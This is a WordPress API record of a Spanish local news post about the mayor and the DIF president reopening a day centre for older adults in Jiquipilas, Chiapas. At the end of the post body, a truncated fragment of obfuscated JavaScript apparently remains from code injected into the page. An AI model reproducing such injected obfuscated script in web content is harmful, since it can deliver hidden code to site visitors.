{"id":4096,"date":"2022-08-03T02:55:59","date_gmt":"2022-08-03T02:55:59","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=4096"},"modified":"2022-08-03T02:56:02","modified_gmt":"2022-08-03T02:56:02","slug":"hugo-lazaro-y-madely-montejo-reaperturan-casa-dia-del-adulto-mayor-en-jiquipilas","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=4096","title":{"rendered":"Hugo L\u00e1zaro y Madely Montejo reaperturan Casa d\u00eda del adulto mayor en Jiquipilas"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"682\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/IMG-20220802-WA0028-1024x682.jpg\" alt=\"\" class=\"wp-image-4097\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/IMG-20220802-WA0028-1024x682.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/IMG-20220802-WA0028-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/IMG-20220802-WA0028-768x512.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/IMG-20220802-WA0028-310x205.jpg 310w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/IMG-20220802-WA0028.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p> \u2022 Adaptar espacios para la inclusi\u00f3n social y recrear actividades para favorables a personas de la tercera edad.<\/p>\n\n\n\n<p>\u2022 El alcalde y presidenta del DIF refrendaron su compromiso por velar por la paz y tranquilidad de las y los abuelitos que asisten. <\/p>\n\n\n\n<p>02 de Agosto del 2022. Jiquipilas, Chiapas. \u2013 Con el objetivo de recuperar estrategias de inclusi\u00f3n social y favorables a la salud f\u00edsico y mental, el alcalde C\u00e9sar Hugo L\u00e1zaro Rodr\u00edguez en compa\u00f1\u00eda de la presidenta del DIF Jiquipilas Madely Montejo Maza reaperturaron las actividades de casa d\u00eda del adulto mayor.La presidenta del DIF Jiquipilas Madely Montejo mencion\u00f3 que es una alegr\u00eda y satisfacci\u00f3n el ser testigo de la reapertura de estas actividades que conllevan al beneficio mental y f\u00edsico de las y los adultos mayores, ya que aqu\u00ed generan confianza, estabilidad y seguridad de continuar haciendo actividades recreativas para el entretenimiento; recalc\u00f3 que la encargada Gabriela P\u00e9rez Escobar ser\u00e1 la responsable de velar por el buen desempe\u00f1o y organizaci\u00f3n, a la cual se le brinda la confianza para encaminar bien este proyecto.Hugo L\u00e1zaro mencion\u00f3 que se implement\u00f3 un plan completo para dar la mejor atenci\u00f3n a quienes asistan, ya que contaran con servicios m\u00e9dicos a disposici\u00f3n, tratamiento psicol\u00f3gico y fisioterapia para ayudar a mantener una vida saludable y ejercitada para mayor rendimiento.En representaci\u00f3n de las y los adultos mayores, la C. Laura Mu\u00f1iz agradeci\u00f3 todo el apoyo a las autoridades, quienes siempre est\u00e1n atento a las actividades y visitan de manera personal para demostrar el inter\u00e9s y juntos buscar mejor\u00edas que ayuden a la convivencia.Por \u00faltimo Montejo Maza dio a conocer los horarios de atenci\u00f3n a partir de hoy los d\u00edas martes a viernes en horario de 09:00 am a 12:00 pm, dividido en grupos para evitar aglomeraciones; cabe recalcar que se respeta los protocolos de salud y se dar\u00e1 insumos de sanitizaci\u00f3n para reforzar la protecci\u00f3n, as\u00ed como mantener el monitoreo ante cualquier anormalidad de la salud; dentro de las acciones las y los adultos aprender\u00e1n a realizar manualidades, juegos de mesa, conferencias y se les otorgara refrigerios.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u2022 Adaptar espacios para la inclusi\u00f3n social y recrear actividades para favorables a personas de la tercera edad. \u2022 El alcalde y presidenta del DIF refrendaron su compromiso por velar por la paz y tranquilidad de las y los abuelitos que asisten. 02 de Agosto del 2022. Jiquipilas, Chiapas. \u2013 Con el objetivo de recuperar &hellip;<\/p>\n","protected":false},"author":2,"featured_media":4097,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-4096","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4096","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4096"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4096\/revisions"}],"predecessor-version":[{"id":4098,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4096\/revisions\/4098"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/4097"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4096"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4096"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4096"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}